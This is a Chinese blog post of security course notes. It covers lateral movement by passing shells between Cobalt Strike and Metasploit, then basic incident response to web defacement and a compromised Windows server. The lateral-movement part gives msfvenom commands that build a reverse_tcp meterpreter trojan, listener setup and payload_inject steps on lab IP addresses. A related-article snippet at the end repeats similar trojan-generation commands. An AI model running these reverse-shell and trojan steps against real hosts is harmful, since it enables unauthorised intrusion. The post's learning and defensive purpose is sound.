p72 内网安全-域横向 CS&MSF 联动及应急响应初识

最新推荐文章于 2024-02-06 08:00:00 发布
最新推荐文章于 2024-02-06 08:00:00 发布
阅读量669 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263566/article/details/130489207
版权

数据来源

演示案例

  • MSF&CobaltStrike 联动 Shell
  • WEB 攻击应急响应朔源-后门,日志
  • WIN 系统攻击应急响应朔源-后门,日志,流量
  • 临时给大家看看学的好的怎么干对应 CTF 比赛

案例1 - MSF&CobaltStrike联动Shell

CS下载与安装:cobaltstrike的安装与基础使用_cobalt strike windows运行_正经人_____的博客-CSDN博客

环境准备:一台kali,一台靶机(我这里为了简单一点,就用两台虚拟机,你可以在远程服务器部署CS,然后kali中运行MSF(kail自带),最后在找一台靶机) 

CS->MSF

1)先配置cs

先使用CS创建一个监听器

随便使用个监听器生成木马并上线就好(使用那个监听器生成木马上线都行,只要能上线)

2)使用msf创建监听

我这里是在kali中重新打开一个终端(msf是kali自带的)

msfconsole                         # 启动 metasploita命令行
use exploit/multi/handler          # 使用模块
set payload windows/meterpreter/reverse_http      # 这里使用的攻击载荷要与CS监听器的相同(名字并不是完全相同,同样是windows的模块 然后最后的协议一样就好reverse_http)

set lhost 192.168.22.145         # 设置监听的ip,要与cs的监听器相同

set lport 6677                    # 端口也要与cs监听器端口保持一致
run                               # 启动模块

 

然后回到cs将后门的shell转发一个给msf 

 

大概等一分钟左右就上线了

MSF->CS

1)CS创建监听器 

 

2)使用msf拿到受害者的shell会话

要使用msf创建木马然后开启监听,再把木马复制到受害者主机中上线

生成木马

#                  攻击载荷                             监听ip       监听端口   demo999.exe(生成的文件名)         
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.3 lport=9988 -f exe -o demo999.exe

开启监听

msfconsole                                        # 启动 metasploita命令行
use exploit/multi/handler                         # 使用模块
set payload windows/x64/meterpreter/reverse_tcp   # 这个攻击载荷就是上面我们使用的攻击载荷
set LHOST 192.168.1.3                             # LHOSTS为 listen host (侦听主机)代表你是谁,既kali的IP地址
set lport 9988                                    # 就是要在kali上要开启的端口,注意这里的端口要和前面生成木马文件的端口一样
run                                               # 简单理解就是把鱼钩放到河里

到靶机中执行木马

监听msf的监听情况,成功拿到shell 

3)msf获取到shell会话后的操作

background退出会话,查看当前的sessions会话

 进入模块exploit/windows/local/payload_inject,查看需要设置的参数

use exploit/windows/local/payload_inject        # 进入模块
show options                                    # 查看设置

 

设置payload,这里的payload需要与cs处监听器设置的协议保持一致

set payload windows/meterpreter/reverse_http

show options查看并设置参数,设置端口,与cs处保持一致,设置lhost为cs服务器的ip地址,载入对应的session会话

set lport 17822              # 端口需要与cs监听器端口保持一致``
set lhost 192.168.1.3       # IP设置为msf本地IP,与CS设置保持一致``
set session 1               # 最开启查看的session的id就是1

run     # 最后运行攻击模块

 

 

案例2 - WEB攻击应急响应溯源-后门,日志

故事回顾:某客户反应自己的网站首页出现被篡改,请求支援

分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

  • 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析
  • 思路2:利用后门WebShell查杀脚本或工具找到对应后门文件,定位第一次时间分析
netstat -ano

站在攻击者的角度,去分析。攻击者当前拿到哪些权限,网站还是系统权限。装没装杀软,用渗透者的思路去想问题。注重信息搜集,从攻击面入手查看应急响应。 

1)执行netstat -ano命令,通过开放的端口找到对应的PID。 

netstat -ano   # 查看本机开放的端口

2)执行tasklist -svc命令,通过PID找到对应的进程名称

tasklist /svc

 

3)在任务管理器,找到对应的进程

之后就可以停止服务并删除文件

4)也可以进行日志分析

p74 应急响应-win&linux 分析后门&勒索病毒&攻击_cs生成linux木马_正经人_____的博客-CSDN博客

p73 应急响应-WEB 分析 php&javaweb&自动化工具_正经人_____的博客-CSDN博客 

案例3 - Win系统攻击应急响应溯源-后门,日志,流量

分析:涉及的攻击面 涉及的操作权限 涉及的攻击意图 涉及的攻击方式

故事回顾:某客户反应服务器异常出现卡顿等情况

思路:利用监控工具分析可疑进程,利用杀毒软件分析可疑文件,利用接口工具抓流量

获取进程监控:PCHunter64

 一般的木马是没有产商信息 

但是有些伪装的很好所以这个不能作为我们判断的唯一标准,可以再借助一些其他信息辅助我们进行判断 

远程ip

可以在目标主机的命令行查看端口信息 

# 查看本机端口开放信息
netstat -an

计划任务

系统用户名

还可以借助一些杀毒软件:腾讯、360、火绒这些

获取执行列表:UserAssistView

我感觉这个软件没有 PCHunter64 好用

  

涉及资源

  • https://www.onlinedown.net/soft/628964.htm
  • https://www.cnblogs.com/xiaozi/p/12679777.html
  • http://www.pc6.com/softview/SoftView_195167.html
  • https://github.com/EricZimmerman/AppCompatCacheParser/releases/
狗蛋的博客之旅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
内网服务器被人种植shell,怎么做应急响应(简单高效一般流程)
Vdieoo的博客
10-30 449
内网服务器被人种植shell,怎么做应急响应 常态化安全检查与安全加固 中间是流程 下层是 收集安全系统报警信息,根据威胁情报平台和之前误报的信息初步研判(何种安全事件),自己能解决则利用应急技能(进程分析,日志分析,样本分析)(清理处置:断网后远程连接杀进程,删文件,打补丁,查看攻击途径与操作并修复)自己解决。不能则进行上报,处理完后输出安全...
索尼DSC-P72产品介绍及详细规格表
07-09
索尼DSC-P72是一款由索尼公司推出的便携式数码相机,主要特点是其高分辨率、自动功能和先进的图像处理技术。这款相机的核心是1/2.7英寸的索尼Super HAD传感器,具备320万有效像素,确保了高质量的图像输出。...
128-记一次内网失陷的应急响应.pdf
09-20
128-记一次内网失陷的应急响应.pdf
企业内网失陷后应急响应
Delphinidae
07-17 708
已知道内网主机被远控应急处理。
内网-横向CS&MSF联动应急响应初识
mingyqf的博客
11-24 914
内网-横向CS&MSF联动应急响应初识 本课重点: 案例1:MSF&CobaltStrike联动Shell 案例2:WEB攻击应急响应朔源-后门,日志 案例3:WIN系统攻击应急响应朔源-后门,日志,流量 案例1:MSF&CobaltStrike联动Shell 为什么要进行联动?因为csmsf经常相互调用,有一些功能cs强一点,有一些可能msf强一点,所以在渗透测试的时候经常要切换!所以我们需要学习如何在csmsf、powershell之间进行会话委派。powersh
网络安全应急响应经验分享(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
02-06 1641
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
ruby-1.8.7-p72-i386-mswin32.zip
08-14
ruby-1.8.7-p72-i386-mswin32.zip
ruby-1.8.7-p72.tar.gz
12-11
puppet插件ruby-1.8.7-p72.tar.gz
PostgreSQL+经验谈(德哥)-PostgreSQL2012-p72
04-09
PostgreSQL+经验谈(德哥)-PostgreSQL2012-p72
C39P72DmTt
10-24
C39P72DmTt
内网安全-横向CS&MSF联动应急响应初识
xhscxj的博客
03-25 4037
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上csmsfcs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS
热门推荐
weixin_43263566的博客
01-11 1万+
渗透测试之基本的攻击流程
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 4288
使用kali制作Android木马并进行通讯录渗透的学习笔记
MSF手机渗透实验
weixin_63204687的博客
10-22 4216
可真刑,太可拷了
Kali Linux使用MSF木马入侵安卓手机
philip_z的博客
02-13 7912
Kali Linux使用MSF木马入侵安卓手机
网安学习笔记 6 ---- 安卓木马软件的使用(复杂版)
ymy13326056686的博客
09-12 578
2023.9.12。
msf生成木马
qq_44657899的博客
04-03 4177
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST
msf入侵安卓实战
m0_65109001的博客
01-04 2424
msf安卓渗透
MSFCS联动
GoDunTong's Blog
04-08 4128
转载自Snowming04’s Blog 0x01 准备工作 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。 MSF:本地 kali Cobalt Strike 团队服务器:Ubuntu VPS Cobalt Strike:3.14 团队服务器: 客户端: 上线过程: 因为我关闭了一切杀软及 Windows Defender,自不必做免杀。 一些朋友搞不清楚 Windows Executable 和 Windows Exec.
解释一下这段代码#ifdef USE_HANDSHAKE INTP_Init(1 << 0, INTP_RISING); INTP_Start(1 << 0); #endif PORT->PMC7 &= ~(3<<1); // P71, P72 digital function PORT->PM7 &= ~(3<<1); // P71, P72 output mode PORT->P7 |= (3<<1); // P71/LED, P72/LED OFF //======================================================================= // spi MODE 0 Master transmission/reception // Mode 0: CPOL = 0, CPHA = 0; i.e. DAP = 1, CKP = 1 // Mode 1: CPOL = 0, CPHA = 1; i.e. DAP = 0, CKP = 1 // Mode 2: CPOL = 1, CPHA = 0; i.e. DAP = 1, CKP = 0 // Mode 3: CPOL = 1, CPHA = 1; i.e. DAP = 0, CKP = 0 //======================================================================= #ifdef TEST_SPI_MODE_0 SPI_MasterInit(SPI_MODE_0); #ifdef USE_HANDSHAKE /* waiting slave ready */ while(g_intp0Taken == 0); g_intp0Taken = 0; #endif //----------------------------------------------------------------------- // Master Send and Slave Receive //----------------------------------------------------------------------- SPI_MasterSend(mtx_buf, sizeof(mtx_buf)); #ifdef SPI_WITH_DMA SysTick->CTRL &= ~SysTick_CTRL_TICKINT_Msk; /* Disable SysTick IRQ */ __WFI(); SysTick->CTRL |= SysTick_CTRL_TICKINT_Msk; /* Enable SysTick IRQ */ #else while(gp_spi_tx_address != 0); #endif delayMS(5);
07-14
这段代码中包含了一些与SPI通信和GPIO操作相关的代码。下面我逐行解释每一部分的功能: ```c #ifdef USE_HANDSHAKE INTP_Init(1 << 0, INTP_RISING); INTP_Start(1 << 0); #endif ``` 这部分代码是一个条件编译,当定义了`USE_HANDSHAKE`宏时,会执行其中的代码。它初始化并启动外部中断INTP,当引脚0上的电平发生上升沿时触发中断。 ```c PORT->PMC7 &= ~(3<<1); // P71, P72 digital function PORT->PM7 &= ~(3<<1); // P71, P72 output mode PORT->P7 |= (3<<1); // P71/LED, P72/LED OFF ``` 这部分代码用于配置端口P71和P72的功能。它将P71和P72配置为数字功能,并将其设置为输出模式。最后,它将P71和P72引脚的输出状态设置为高电平,即关闭LED。 ```c #ifdef TEST_SPI_MODE_0 SPI_MasterInit(SPI_MODE_0); ``` 这部分代码也是一个条件编译,当定义了`TEST_SPI_MODE_0`宏时,会执行其中的代码。它初始化SPI主设备,并将SPI模式设置为模式0,即CPOL=0、CPHA=0。 ```c #ifdef USE_HANDSHAKE /* waiting slave ready */ while(g_intp0Taken == 0); g_intp0Taken = 0; #endif ``` 这部分代码也是一个条件编译,当定义了`USE_HANDSHAKE`宏时,会执行其中的代码。它在主设备发送数据之前等待从设备就绪。具体来说,它会不断检查一个标志位`g_intp0Taken`是否为0,直到从设备发出中断信号并将该标志位置为0。 ```c SPI_MasterSend(mtx_buf, sizeof(mtx_buf)); ``` 这行代码用于向SPI从设备发送数据。它将`mtx_buf`缓冲区的数据发送给从设备,并指定发送数据的长度。 ```c #ifdef SPI_WITH_DMA SysTick->CTRL &= ~SysTick_CTRL_TICKINT_Msk; /* Disable SysTick IRQ */ __WFI(); SysTick->CTRL |= SysTick_CTRL_TICKINT_Msk; /* Enable SysTick IRQ */ #else while(gp_spi_tx_address != 0); #endif ``` 这部分代码也是一个条件编译,当定义了`SPI_WITH_DMA`宏时,会执行其中的代码。如果使用DMA进行SPI传输,它会禁用SysTick中断,然后进入等待模式,等待DMA传输完成。如果没有使用DMA,则会检查一个指针变量`gp_spi_tx_address`是否为0,直到传输完成。 ```c delayMS(5); ``` 这行代码用于延时5毫秒。具体的延时函数实现可能在其他地方定义。 总的来说,这段代码的功能是进行SPI通信,并通过GPIO控制一些外设,还包括中断处理和延时等操作。具体的功能和实现可能与你的系统配置和应用有关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

狗蛋的博客之旅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值